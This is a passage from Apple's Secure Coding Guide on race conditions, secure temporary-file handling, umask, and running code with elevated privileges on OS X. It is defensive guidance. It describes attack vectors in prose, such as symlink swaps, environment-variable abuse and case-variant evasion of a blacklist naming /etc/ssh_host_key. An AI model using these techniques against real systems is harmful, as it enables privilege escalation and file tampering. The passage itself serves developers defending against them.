for example, to cause your application to write the contents intended for a temporary file to a critical system file instead, thus corrupting the system. Alternatively, the attacker can capture data you are writing or can substitute the attacker’s data for your own when you read the temporary file. In general, you should avoid functions,such as chown and stat, that follow symbolic links(see Table 4-1 (page 55) for alternatives). As with hard links, your program should evaluate whether a symbolic link is acceptable, and if not, should handle the situation gracefully. Case-Insensitive File Systems Can Thwart Your Security Model In OS X, any partition (including the boot volume) can be either case-sensitive, case-insensitive but case-preserving, or, for non-boot volumes, case-insensitive. For example, HFS+ can be either case-sensitive or case-insensitive but case-preserving. FAT32 is case-insensitive but case-preserving. FAT12, FAT16, and ISO-9660 (without extensions) are case-insensitive. An application that is unaware of the differences in behavior between these volume formats can cause serious security holes if you are not careful. In particular: ● If your program uses its own permission model to provide or deny access (for example, a web server that allows access only to files within a particular directory), you must either enforce this with a chroot jail or be vigilant about ensuring that you correctly identify paths even in a case-insensitive world. Among other things, this meansthat you should ideally use a whitelisting scheme rather than a blacklisting scheme (with the default behavior being “deny”). If this is not possible, for correctness, you must compare each individual path part against your blacklist using case-sensitive or case-insensitive comparisons, depending on what type of volume the file resides on. For example, if your program has a blacklist that prevents users from uploading or downloading the file /etc/ssh_host_key, if your software is installed on a case-insensitive volume, you must also reject someone who makes a request for /etc/SSH_host_key, /ETC/SSH_HOST_KEY, or even /ETC/ssh_host_key. ● If your program periodically accesses a file on a case-sensitive volume using the wrong mix of uppercase and lowercase letters, the open call will fail... until someone creates a second file with the name your program is actually asking for. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 49If someone creates such a file, your application will dutifully load data from the wrong file. If the contents of that file affect your application’s behavior in some important way, this represents a potential attack vector. This also presents a potential attack vector if that file is an optional part of your application bundle that gets loaded by dyld when your application is launched. Create Temporary Files Correctly The temporary directories in OS X are shared among multiple users. This requires that they be writable by multiple users. Any time you work on files in a location to which others have read/write access, there’s the potential for the file to be compromised or corrupted. The following list explains how to create temporary files using APIs at various layers of OS X. POSIX Layer In general, you should always use the mkstemp function to create temporary files at the POSIX layer. The mkstemp function guarantees a unique filename and returns a file descriptor, thus allowing you skip the step of checking the open function result for an error, which might require you to change the filename and call open again. If you must create a temporary file in a public directory manually, you can use the open function with the O_CREAT and O_EXCL flags set to create the file and obtain a file descriptor. The O_EXCL flag causes this function to return an error if the file already exists. Be sure to check for errors before proceeding. After you’ve opened the file and obtained a file descriptor, you can safely use functions that take file descriptors, such as the standard C functions write and read, for as long as you keep the file open. See the manual pages for open(2), mkstemp(3), write(2), and read(2) for more on these functions, and see Wheeler, Secure Programming for Linux and Unix HOWTO for advantages and shortcomings to using these functions. Carbon To find the default location to store temporary files, you can call the FSFindFolder function and specify a directory type of kTemporaryFolderType. This function checks to see whether the UID calling the function owns the directory and, if not, returns the user home directory in ~/Library. Therefore, this function returns a relatively safe place to store temporary files. Thislocation is not assecure as a directory that you created and that is accessible only by your program. The FSFindFolder function is documented in Folder Manager Reference . If you’ve obtained the file reference of a directory (from the FSFindFolder function, for example), you can use the FSRefMakePath function to obtain the directory’s path name. However, be sure to check the function result, because if the FSFindFolder function fails, it returns a null string. If you don’t Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 50check the function result, you might end up trying to create a temporary file with a pathname formed by appending a filename to a null string. Cocoa There are no Cocoa methods that create a file and return a file descriptor. However, you can call the standard C open function from an Objective-C program to obtain a file descriptor (see “Working With Publicly Writable Files Using POSIX Calls” (page 54)). Or you can call the mkstemp function to create a temporary file and obtain a file descriptor. Then you can use the NSFileHandle method initWithFileDescriptor: to initialize a file handle, and other NSFileHandle methods to safely write to or read from the file. Documentation for the NSFileHandle class is in Foundation Framework Reference . To obtain the path to the default location to store temporary files (stored in the $TMPDIR environment variable), you can use the NSTemporaryDirectory function, which calls the FSFindFolder and FSRefMakePath functions for you (see “Working With Publicly Writable Files Using Carbon” (page 55)). Note that NSTemporaryDirectory can return /tmp under certain circumstances such as if you link on a pre-OS X v10.3 development target. Therefore, if you’re using NSTemporaryDirectory, you either have to be sure that using /tmp is suitable for your operation or, if not, you should consider that an error case and create a more secure temporary directory if that happens. The changeFileAttributes:atPath: method in the NSFileManager class is similar to chmod or chown, in that it takes a file path rather than a file descriptor. You shouldn’t use this method if you’re working in a public directory or a user’s home directory. Instead, call the fchown or fchmod function (see Table 4-1 (page 55)). You can call the NSFileHandle class’s fileDescriptor method to get the file descriptor of a file in use by NSFileHandle. In addition, when working with temporary files, you should avoid the writeToFile:atomically methods of NSString and NSData. These are designed to minimize the risk of data loss when writing to a file, but do so in a way that is not recommended for use in directories that are writable by others. See “Working With Publicly Writable Files Using Cocoa” (page 56) for details. Files in Publicly Writable Directories Are Dangerous Files in publicly writable directories must be treated as inherently untrusted. An attacker can delete the file and replace it with another file, replace it with a symbolic link to another file, create the file ahead of time, and so on. There are ways to mitigate each of these attacks to some degree, but the best way to prevent them is to not read or write files in a publicly writable directory in the first pace. If possible, you should create a subdirectory with tightly controlled permissions, then write your files inside that subdirectory. If you must work in a directory to which your process does not have exclusive access, however, you must check to make sure a file does not exist before you create it. You must also verify that the file you intend to read from or write to is the same file that you created. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 51To this end, you should always use routines that operate on file descriptors rather than pathnames wherever possible, so that you can be certain you’re always dealing with the same file. To do this, pass the O_CREAT and O_EXCL flags to the open system call. This creates a file, but fails if the file already exists. Note: If you cannot use file descriptors directly for some reason, you should explicitly create files as a separate step from opening them. Although this does not prevent someone from swapping in a new file between those operations, at least it narrows the attack window by making it possible to detect if the file already exists. Before you create the file, however, you should first set your process’s file creation mask (umask). The file creation mask is a bitmask that alters the default permissions of all new files and directories created by your process. This bitmask is typically specified in octal notation, which means that it must begin with a zero (not 0x). For example, if you set the file creation mask to 022, any new files created by your process will have rw-r--r-- permissions because the write permission bits are masked out. Similarly, any new directories will have rw-r-xr-x permissions. Note: New files never have the execute bit set. Directories, however, do. Therefore, you should generally mask out execute permission when masking out read permission unless you have a specific reason to allow users to traverse a directory without seeing its contents. To limit access to any new files or directories so that only the user can access them, set the file creation mask to 077. You can also mask out permissions in such a way that they apply to the user, though this is rare. For example, to create a file that no one can write or execute, and that only the user can read, you could set the file creation mask to 0377. This is not particularly useful, but it is possible. There are several ways to set the file creation mask: In C code: In C code, you can set the file creation mask globally using the umask system call. You can also passthe file creation mask to the open or mkdir system call when creating a file or directory. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 52Note: For maximum portability when writing C code, you should always create your masks using the file mode constants defined in . For example: umask(S_IRWXG|S_IRWXO); In shell scripts: In shell scripts, you set the file creation mask by using the umask shell builtin. This is documented in the manual pages for sh or csh. For example: umask 0077; As an added security bonus, when a process calls another process, the new processinheritsthe parent process’s file creation mask. Thus, if your process starts another process that creates a file without resetting the file creation mask, that file similarly will not be accessible to other users on the system. This is particularly useful when writing shell scripts. For more information on the file creation mask,see the manual page for umask and Viega and McGraw, Building Secure Software , Addison Wesley, 2002. For a particularly lucid explanation of the use of a file creation mask, see http://web.archive.org/web/20090517063338/http://www.sun.com/bigadmin/content/submitted/umask_permissions.html?. Before you read a file (but after opening it), make sure it has the owner and permissions you expect (using fstat). Be prepared to fail gracefully (rather than hanging) if it does not. Here are some guidelines to help you avoid time-of-check–time-of-use vulnerabilities when working with files in publicly writable directories. For more detailed discussions, especially for C code, see Viega and McGraw, Building Secure Software , Addison Wesley, 2002, and Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secure-programs/. ● If at all possible, avoid creating temporary files in a shared directory, such as /tmp, or in directories owned by the user. If anyone else has access to your temporary file, they can modify its content, change its ownership or mode, or replace it with a hard or symbolic link. It’s much safer to either not use a temporary file at all (use some other form of interprocess communication) or keep temporary files in a directory you create and to which only your process (acting as your user) has access. ● If your file must be in a shared directory, give it a unique (and randomly generated) filename (you can use the C function mkstemp to do this), and never close and reopen the file. If you close such a file, an attacker can potentially find it and replace it before you reopen it. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 53Here are some public directories that you can use: ● ~/Library/Caches/TemporaryItems When you use this subdirectory, you are writing to the user’s own home directory, not some other user’s directory or a system directory. If the user’s home directory has the default permissions, it can be written to only by that user and root. Therefore, this directory is not as susceptible to attack from outside, nonprivileged users as some other directories might be. ● /var/run This directory is used for process ID (pid) files and other system files needed just once per startup session. This directory is cleared out each time the system starts up. ● /var/db This directory is used for databases accessible to system processes. ● /tmp This directory is used for general shared temporary storage. It is cleared out each time the system starts up. ● /var/tmp This directory is used for general shared temporary storage. Although you should not count on data stored in this directory being permanent, unlike /tmp, the /var/tmp directory is currently not cleared out on reboot. For maximum security, you should always create temporary subdirectories within these directories, set appropriate permissions on those subdirectories, and then write files into those subdirectories. The following sections give some additional hints on how to follow these principles when you are using POSIX-layer C code, Carbon, and Cocoa calls. Working with Publicly Writable Files Using POSIX Calls If you need to open a preexisting file to modify it or read from it, you should check the file’s ownership, type, and permissions, and the number of links to the file before using it. To safely opening a file for reading, for example, you can use the following procedure: 1. Call the open function and save the file descriptor. Pass the O_NOFOLLOW to ensure that it does not follow symbolic links. 2. Using the file descriptor, call the fstat function to obtain the stat structure for the file you just opened. 3. Check the user ID (UID) and group ID (GID) of the file to make sure they are correct. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 544. Check the file's mode flags to make sure that it is a normal file, not a FIFO, device file, or other special file. Specifically, if the stat structure is named st, then the value of (st.st_mode & S_IFMT) should be equal to S_IFREG. 5. Check the read, write, and execute permissions for the file to make sure they are what you expect. 6. Check that there is only one hard link to the file. 7. Pass around the open file descriptor for later use rather than passing the path. Note that you can avoid all the status checking by using a secure directory instead of a public one to hold your program’s files. Table 4-1 shows some functions to avoid—and the safer equivalent functions to use—in order to avoid race conditions when you are creating files in a public directory. Table 4-1 C file functions to avoid and to use Functions to avoid Functions to use instead open returns a file descriptor; creates a file and returns an error if the file already exists when the O_CREAT and O_EXCL options are used fopen returns a file pointer; automatically creates the file if it does not exist but returns no error if the file does exist chmod takes a file path fchmod takes a file descriptor fchown takes a file descriptor and does not follow symbolic links chown takes a file path and follows symbolic links lstat takes a file path but does not follow symbolic links; fstat takes a file descriptor and returns information about an open file stat takes a file path and follows symbolic links mkstemp creates a temporary file with a unique name, opens it for reading and writing, and returns a file descriptor mktemp creates a temporary file with a unique name and returns a file path; you need to open the file in another call Working with Publicly Writable Files Using Carbon If you are using the Carbon File Manager to create and open files, you should be aware of how the File Manager accesses files. ● The file specifier FSSpec structure uses a path to locate files, not a file descriptor. Functions that use an FSSpec file specifier are deprecated and should not be used in any case. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 55● The file reference FSRef structure uses a path to locate files and should be used only if your files are in a safe directory, not in a publicly accessible directory. These functions include FSGetCatalogInfo, FSSetCatalogInfo, FSCreateFork, and others. ● The File Manager creates and opensfilesin separate operations. The create operation failsif the file already exists. However, none of the file-creation functions return a file descriptor. If you’ve obtained the file reference of a directory (from the FSFindFolder function, for example), you can use the FSRefMakePath function to obtain the directory’s path name. However, be sure to check the function result, because if the FSFindFolder function fails, it returns a null string. If you don’t check the function result, you might end up trying to create a temporary file with a pathname formed by appending a filename to a null string. Working with Publicly Writable Files Using Cocoa The NSString and NSData classes have writeToFile:atomically methods designed to minimize the risk of data loss when writing to a file. These methods write first to a temporary file, and then, when they’re sure the write is successful, they replace the written-to file with the temporary file. This is not always an appropriate thing to do when working in a public directory or a user’s home directory, because there are a number of path-based file operationsinvolved. Instead, initialize an NSFileHandle object with an existing file descriptor and use NSFileHandle methods to write to the file, as mentioned above. The following code, for example, usesthe mkstemp function to create a temporary file and obtain a file descriptor, which it then usesto initialize NSFileHandle: fd = mkstemp(tmpfile); // check return for -1, which indicates an error NSFileHandle *myhandle = [[NSFileHandle alloc] initWithFileDescriptor:fd]; Working with Publicly Writable Files in Shell Scripts Scripts must follow the same general rules as other programs to avoid race conditions. There are a few tips you should know to help make your scripts more secure. First, when writing a script, set the temporary directory ($TMPDIR) environment variable to a safe directory. Even if your script doesn’t directly create any temporary files, one or more of the routines you call might create one, which can be a security vulnerability if it’s created in an insecure directory. See the manual pages for setenv and setenv for information on changing the temporary directory environment variable. For the same reason, set your process’ file code creation mask (umask) to restrict access to any files that might be created by routines run by your script (see “Securing File Operations” (page 47) for more information on the umask). Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 56It’s also a good idea to use the dtruss command on a shell script so you can watch every file access to make sure that no temporary files are created in an insecure location. See the manual pages for dtrace and dtruss for more information. Do not redirect output using the operators > or >> to a publicly writable location. These operators do not check to see whether the file already exists, and they follow symbolic links. Instead, pass the -d flag to the mktemp command to create a subdirectory to which only you have access. It’s important to check the result to make sure the command succeeded. if you do all your file operations in this directory, you can be fairly confident that no one with less than root access can interfere with your script. For more information, see the manual page for mktemp. Do not use the test command (or its left bracket ([) equivalent) to check for the existence of a file or other statusinformation for the file before writing to it. Doing so alwaysresultsin a race condition; that is, it is possible for an attacker to create, write to, alter, or replace the file before you start writing. See the manual page for test for more information. For a more in-depth look at security issues specific to shell scripts, read “Shell Script Security” in Shell Scripting Primer. Other Tips Here are a few additional things to be aware of when working with files: ● Before you attempt a file operation, make sure it is safe to perform the operation on that file. For example, before attempting to read a file (but after opening it), you should make sure that it is not a FIFO or a device special file. ● Just because you can write to a file, that doesn’t mean you should write to it. For example, the fact that a directory exists doesn’t mean you created it, and the fact that you can append to a file doesn’t mean you own the file or no one else can write to it. ● OS X can perform file operations on files in several different file systems. Some operations can be done only on certain systems. For example, certain file systems honor setuid files when executed from them and some don’t. Be sure you know what file system you’re working with and what operations can be carried out on that system. ● Local pathnames can point to remote files. For example, the path /volumes/foo might actually be someone’s FTP server rather than a locally-mounted volume. Just because you’re accessing something by a pathname, that does not guarantee that it’s local or that it should be accessed. ● A user can mount a file system anywhere they have write access and own the directory. In other words, almost anywhere a user can create a directory, they can mount a file system on top of it. Because this can be done remotely, an attacker running as root on a remote system could mount a file system into your home directory. Files in that file system would appear to be files in your home directory owned by root. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 57For example, /tmp/foo might be a local directory, or it might be the root mount point of a remotely mounted file system. Similarly, /tmp/foo/bar might be a local file, or it might have been created on another machine and be owned by root over there. Therefore, you can’t trust files based only on ownership, and you can’t assume that setting the UID to 0 was done by someone you trust. To tell whether the file is mounted locally, use the fstat call to check the device ID. If the device ID is different from that of files you know to be local, then you’ve crossed a device boundary. ● Remember that users can read the contents of executable binariesjust as easily asthe contents of ordinary files. For example, the user can run strings(1) to quickly see a list of (ostensibly) human-readable strings in your executable. ● When you fork a new process, the child process inherits all the file descriptors from the parent unless you set the close-on-exec flag. If you fork and execute a child process and drop the child process’ privileges so its real and effective IDs are those of some other user (to avoid running that process with elevated privileges), then that user can use a debugger to attach the child process. They can then run arbitrary code from that running process. Because the child process inherited all the file descriptors from the parent, the user now has access to every file opened by the parent process. See “Inheriting File Descriptors” (page 61) for more information on this type of vulnerability. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 58By default, applications run as the currently logged in user. Different users have different rights when it comes to accessing files, changing systemwide settings, and so on, depending on whether they are admin users or ordinary users. Some tasks require additional privileges above and beyond what even an admin user can do by default. An application or other process with such additional rights is said to be running with elevated privileges. Running code with root or administrative privileges can intensify the dangers posed by security vulnerabilities. This chapter explains the risks, provides alternatives to privilege elevation, and describes how to elevating privileges safely when you can’t avoid it. Note: Elevating privileges is not allowed in applications submitted to the Mac App Store (and is not possible in iOS). Circumstances Requiring Elevated Privileges Regardless of whether a user is logged in as an administrator, a program might have to obtain administrative or root privileges in order to accomplish a task. Examples of tasks that require elevated privileges include: ● manipulating file permissions, ownership ● creating, reading, updating, or deleting system and user files ● opening privileged ports (those with port numbers less than 1024) for TCP and UDP connections ● opening raw sockets ● managing processes ● reading the contents of virtual memory ● changing system settings ● loading kernel extensions If you have to perform a task that requires elevated privileges, you must be aware of the fact that running with elevated privileges means that if there are any security vulnerabilities in your program, an attacker can obtain elevated privileges as well, and would then be able to perform any of the operations listed above. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 59 Elevating Privileges SafelyThe Hostile Environment and the Principle of Least Privilege Any program can come under attack, and probably will. By default, every process runs with the privileges of the user or process that started it. Therefore, if a user has logged on with restricted privileges, your program should run with those restricted privileges. This effectively limits the amount of damage an attacker can do, even if he successfully hijacks your program into running malicious code. Do not assume that the user islogged in with administrator privileges; you should be prepared to run a helper application with elevated privileges if you need them to accomplish a task. However, keep in mind that, if you elevate your process’s privileges to run asroot, an attacker can gain those elevated privileges and potentially take over control of the whole system. Note: Although in certain circumstances it’s possible to mount a remote attack over a network, for the most part the vulnerabilities discussed here involve malicious code running locally on the target computer. If an attacker uses a buffer overflow or othersecurity vulnerability (see “Types of Security Vulnerabilities” (page 11)) to execute code on someone else’s computer, they can generally run their code with whatever privileges the logged-in user has. If an attacker can gain administrator privileges, they can elevate to root privileges and gain accessto any data on the user’s computer. Therefore, it is good security practice to log in as an administrator only when performing the rare tasks that require admin privileges. Because the default setting for OS X is to make the computer’s owner an administrator, you should encourage your usersto create a separate non-admin login and to use that for their everyday work. In addition, if possible, you should not require admin privileges to install your software. The idea of limiting risk by limiting access goes back to the “need to know” policy followed by government security agencies (no matter what your security clearance, you are not given access to information unless you have a specific need to know that information). In software security, this policy is often termed “the principle of least privilege,” first formally stated in 1975: “Every program and every user of the system should operate using the leastset of privileges necessary to complete the job.”(Saltzer,J.H. AND Schroeder, M.D.,“The Protection of Information in Computer Systems,” Proceedings of the IEEE , vol. 63, no. 9, Sept 1975.) In practical terms, the principle of least privilege means you should avoid running asroot, or—if you absolutely must run asroot to perform some task—you should run a separate helper application to perform the privileged task (see “Factoring Applications” (page 69)). By running with the least privilege possible, you: ● Limit damage from accidents and errors, including maliciously introduced accidents and errors ● Reduce interactions of privileged components, and therefore reduce unintentional, unwanted, and improper uses of privilege (side effects) Elevating Privileges Safely The Hostile Environment and the Principle of Least Privilege 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 60Keep in mind that, even if your code is free of errors, vulnerabilities in any libraries your code links in can be used to attack your program. For example, no program with a graphical user interface should run with privileges because the large number of libraries used in any GUI application makes it virtually impossible to guarantee that the application has no security vulnerabilities. There are a number of ways an attacker can take advantage of your program if you run as root. Some possible approaches are described in the following sections. Launching a New Process Because any new process runs with the privileges of the process that launched it, if an attacker can trick your process into launching his code, the malicious code runs with the privileges of your process. Therefore, if your process is running with root privileges and is vulnerable to attack, the attacker can gain control of the system. There are many ways an attacker can trick your code into launching malicious code, including buffer overflows, race conditions, and social engineering attacks (see “Types of Security Vulnerabilities” (page 11)). Executing Command-Line Arguments Because all command-line arguments, including the program name (argv(0)), are under the control of the user, you should not use the command line to execute any program without validating every parameter, including the name. If you use the command line to re-execute your own code or execute a helper program, for example, a malicious user might have substituted his own code with that program name, which you are now executing with your privileges. Inheriting File Descriptors When you create a new process, the child process inherits its own copy of the parent process’s file descriptors (see the manual page for fork(2)). Therefore, if you have a handle on a file, network socket, shared memory, or other resource that’s pointed to by a file descriptor and you fork off a child process, you must be careful to either close the file descriptor or you must make sure that the child process cannot be tampered with. Otherwise, a malicious user can use the subprocess to tamper with the resources referenced by the file descriptors. For example, if you open a password file and don’t close it before forking a process, the new subprocess has access to the password file. To set a file descriptor so that it closes automatically when you execute a new process (such as by using the execve system call), use the fcntl(2) command to set the close-on-exec flag. You mustset thisflag individually for each file descriptor; there’s no way to set it for all. Elevating Privileges Safely The Hostile Environment and the Principle of Least Privilege 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 61Abusing Environment Variables Most libraries and utilities use environment variables. Sometimes environment variables can be attacked with buffer overflows or by inserting inappropriate values. If your program links in any libraries or calls any utilities, your program is vulnerable to attacks through any such problematic environment variables. If your program is running as root, the attacker might be able to bring down or gain control of the whole system in this way. Examples of environment variables in utilities and libraries that have been attacked in the past include: 1. The dynamic loader: LD_LIBRARY_PATH, DYLD_LIBRARY_PATH are often misused, causing unwanted side effects. 2. libc: MallocLogFile 3. Core Foundation: CF_CHARSET_PATH 4. perl: PERLLIB, PERL5LIB, PERL5OPT [ 2 CVE-2005-2748 (corrected in Apple Security Update 2005-008) 3 CVE-2005-0716 (corrected in Apple Security Update 2005-003) 4 CVE-2005-4158] Environment variables are also inherited by child processes. If you fork off a child process, your parent process should validate the values of all environment variables before it uses them in case they were altered by the child process (whether inadvertently or through an attack by a malicious user). Modifying Process Limits You can use the setrlimit call to limit the consumption of system resources by a process. For example, you can set the largest size of file the process can create, the maximum amount of CPU time the process can consume, and the maximum amount of physical memory a process may use. These process limits are inherited by child processes. In order to prevent an attacker from taking advantage of open file descriptors, programsthat run with elevated privileges often close all open file descriptors when they start up. However, if an attacker can use setrlimit to alter the file descriptor limit, he can fool the program into leaving some of the files open. Those files are then vulnerable. Similarly, a vulnerability was reported for a version of Linux that made it possible for an attacker, by decreasing the maximum file size, to limit the size of the /etc/passwd and /etc/shadow files. Then, the next time a utility accessed one of these files, it truncated the file, resulting in a loss of data and denial of service. [CVE-2002-0762] Elevating Privileges Safely The Hostile Environment and the Principle of Least Privilege 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 62File Operation Interference If you’re running with elevated privileges in order to write or read files in a world-writable directory or a user’s directory, you must be aware of time-of-check–time-of-use problems; see “Time of Check Versus Time of Use” (page 44). Avoiding Elevated Privileges In many cases, you can accomplish your task without needing elevated privileges. For example, suppose you need to configure the environment (add a configuration file to the user’s home directory or modify a configuration file in the user’s home directory) for your application. You can do this from an installer running asroot (the installer command requires administrative privileges;see the manual page for installer(8)). However, if you have the application configure itself, or check whether configuration is needed when it starts up, then you don’t need to run as root at all. An example of using an alternate design in order to avoid running with elevated privileges is given by the BSD ps command, which displaysinformation about processesthat have controlling terminals. Originally, BSD used the setgid bit to run the ps command with a group ID of kmem, which gave it privilegesto read kernel memory. More recent implementations of the ps command use the sysctl utility to read the information it needs, removing the requirement that ps run with any special privileges. Running with Elevated Privileges If you do need to run code with elevated privileges, there are several approaches you can take: ● You can run a daemon with elevated privileges that you call on when you need to perform a privileged task. The preferred method of launching a daemon is to use the launchd daemon (see “launchd” (page 66)). It is easier to use launchd to launch a daemon and easier to communicate with a daemon than it is to fork your own privileged process. ● You can use the authopen command to read, create, or update a file (see “authopen” (page 65)). ● You can set the setuid and setgid bitsfor the executable file of your code, and set the owner and group of the file to the privilege level you need; for example, you can set the owner to root and the group to wheel. Then when the code is executed, it runs with the elevated privileges of its owner and group rather than with the privileges of the process that executed it. (See the “Permissions” section in the “Security Concepts” chapter in Security Overview.) This technique is often used to execute the privileged code in a factored application (see “Factoring Applications” (page 69)). As with other privileged code, you must be very sure that there are no vulnerabilities in your code and that you don’t link in any libraries or call any utilities that have vulnerabilities. Elevating Privileges Safely Avoiding Elevated Privileges 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 63If you fork off a privileged process, you should terminate it as soon as it has accomplished its task (see “Factoring Applications” (page 69)). Although architecturally thisis often the bestsolution, it is very difficult to do correctly, especially the first time you try. Unless you have a lot of experience with forking off privileged processes, you might want to try one of the other solutions first. ● You can use a BSD system call to change privilege level (see “Calls to Change Privilege Level” (page 64)). These commands have confusing semantics. You must be careful to use them correctly, and it’s very important to check the return values of these calls to make sure they succeeded. Note that in general, unless your process was initially running as root, it cannot elevate its privilege with these calls. However, a process running as root can discard (temporarily or permanently) those privileges. Any process can change from acting on behalf of one group to another (within the set of groups to which it belongs). Calls to Change Privilege Level There are several commands you can use to change the privilege level of a program. The semantics of these commands are tricky, and vary depending on the operating system on which they’re used. Important: If you are running with both a group ID (GID) and user ID (UID) that are different from those of the user, you have to drop the GID before dropping the UID. Once you’ve changed the UID, you may no longer have sufficient privileges to change the GID. Important: As with every security-related operation, you must check the return values of your calls to setuid, setgid, and related routines to make sure they succeeded. Otherwise you might still be running with elevated privileges when you think you have dropped privileges. For more information on permissions,see the “Permissions”section in the “Security Concepts” chapter in Security Overview. For information on setuid and related commands, see Setuid Demystified by Chen, Wagner, and Dean (Proceedings of the 11th USENIX Security Symposium, 2002), available at http://www.usenix.org/publications/library/proceedings/sec02/full_papers/chen/chen.pdf and the manual pages for setuid(2), setreuid(2), setregid(2), and setgroups(2). The setuid(2)manual page includesinformation about seteuid, setgid, and setegid as well. Here are some notes on the most commonly used system calls for changing privilege level: Elevating Privileges Safely Calls to Change Privilege Level 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 64● The setuid function sets the real and effective user IDs and the saved user ID of the current process to a specified value. The setuid function is the most confusing of the UID-setting system calls. Not only does the permission required to use this call differ among different UNIX-based systems, but the action of the call differs among different operating systems and even between privileged and unprivileged processes. If you are trying to set the effective UID, you should use the seteuid function instead. ● The setreuid function modifies the real UID and effective UID, and in some cases, the saved UID. The permission required to use this call differs among different UNIX-based systems, and the rule by which the saved UID is modified is complicated. For this function as well, if your intent is to set the effective UID, you should use the seteuid function instead. ● The seteuid function sets the effective UID, leaving the real UID and saved UID unchanged. In OS X, the effective user ID may be set to the value of the real user ID or of the saved set-user-ID. (In some UNIX-based systems, thisfunction allows you to set the EUID to any of the real UID,saved UID, or EUID.) Of the functions available on OS X that set the effective UID, the seteuid function is the least confusing and the least likely to be misused. ● The setgid function acts similarly to the setuid function, except that it sets group IDs rather than user IDs. It suffers from the same shortcomings as the setuid function; use the setegid function instead. ● The setregid function acts similarly to the setreuid function, with the same shortcomings; use the setegid function instead. ● The setegid function sets the effective GID. This function is the preferred call to use if you want to set the EGID. Avoiding Forking Off a Privileged Process There are a couple of functions you might be able to use to avoid forking off a privileged helper application. The authopen command lets you obtain temporary rights to create, read, or update a file. You can use the launchd daemon to start a process with specified privileges and a known environment. authopen When you run the authopen command, you provide the pathname of the file that you want to access. There are options for reading the file, writing to the file, and creating a new file. Before carrying out any of these operations, the authopen command requests authorization from the system security daemon, which authenticates the user (through a password dialog or other means) and determines whether the user has sufficient rights to carry out the operation. See the manual page for authopen(1) for the syntax of this command. Elevating Privileges Safely Avoiding Forking Off a Privileged Process 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 65launchd Starting with OS X v10.4, the launchd daemon is used to launch daemons and other programs automatically, without user intervention. (If you need to support systems running versions of the OS earlier than OS X v10.4, you can use startup items.) The launchd daemon can launch both systemwide daemons and per-user agents, and can restart those daemons and agents after they quit if they are still needed. You provide a configuration file that tells launchd the level of privilege with which to launch your routine. You can also use launchd to launch a privileged helper. By factoring your application into privileged and unprivileged processes, you can limit the amount of code running as the root user (and thus the potential attack surface). Be sure that you do not request higher privilege than you actually need, and always drop privilege or quit execution as soon as possible. There are several reasons to use launchd in preference to writing a daemon running as the root user or a factored application that forks off a privileged process: ● Because launchd launches daemons on demand, your daemon needs not worry about whether other services are available yet. When it makes a request for one of those services, the service gets started automatically in a manner that is transparent to your daemon. ● Because launchd itself runs as the root user, if your only reason for using a privileged process is to run a daemon on a low-numbered port, you can let launchd open that port on your daemon’s behalf and pass the open socket to your daemon, thus eliminating the need for your code to run as the root user. ● Because launchd can launch a routine with elevated privileges, you do not have to set the setuid or setgid bits for the helper tool. Any routine that has the setuid or setgid bit set is likely to be a target for attack by malicious users. ● A privileged routine started by launchd runs in a controlled environment that can’t be tampered with. If you launch a helper tool that has the setuid bit set, it inherits much of the launching application’s environment, including: ● Open file descriptors (unless their close-on-exec flag is set). ● Environment variables (unless you use posix_spawn, posix_spawnp, or an exec variant that takes an explicit environment argument). ● Resource limits. ● The command-line arguments passed to it by the calling process. ● Anonymous shared memory regions (unattached, but available to reattach, if desired). ● Mach port rights. There are probably others. It is much safer to use launchd, which completely controls the launch environment. Elevating Privileges Safely Avoiding Forking Off a Privileged Process 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 66● It’s much easier to understand and verify the security of a protocol between your controlling application and a privileged daemon than to handle the interprocess communication needed for a process you forked yourself. When you fork a process, it inheritsits environment from your application, including file descriptors and environment variables, which might be used to attack the process (see “The Hostile Environment and the Principle of Least Privilege” (page 60)). You can avoid these problems by using launchd to launch a daemon. ● It’s easier to write a daemon and launch it with launchd than to write factored code and fork off a separate process. ● Because launchd is a critical system component, it receives a lot of peer review by in-house developers at Apple. It is less likely to contain security vulnerabilities than most production code. ● The launchd.plist file includes key-value pairs that you can use to limit the system services—such as memory, number of files, and cpu time—that the daemon can use. For more information on launchd, see the manual pages for launchd, launchctl, and launchd.plist, and Daemons and Services Programming Guide . For more information about startup items, see Daemons and Services Programming Guide . Limitations and Risks of Other Mechanisms In addition to launchd, the following lesser methods can be used to obtain elevated privileges. In each case, you must understand the limitations and risks posed by the method you choose. ● setuid If an executable's setuid bit is set, the program runs as whatever user owns the executable regardless of which process launches it. There are two approaches to using setuid to obtain root (or another user’s) privileges while minimizing risk: ● Launch your program with root privileges, perform whatever privileged operations are necessary immediately, and then permanently drop privileges. ● Launch a setuid helper tool that runs only as long as necessary and then quits. If the operation you are performing needs a group privilege or user privilege other than root, you should launch your program or helper tool with that privilege only, not with root privilege, to minimize the damage if the program is hijacked. It’s important to note that if you are running with both a group ID (GID) and user ID (UID) that are different from those of the user, you have to drop the GID before dropping the UID. Once you’ve changed the UID, you can no longer change the GID. As with every security-related operation, you must check the return values of your calls to setuid, setgid, and related routines to make sure they succeeded. Elevating Privileges Safely Limitations and Risks of Other Mechanisms 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 67For more information about the use 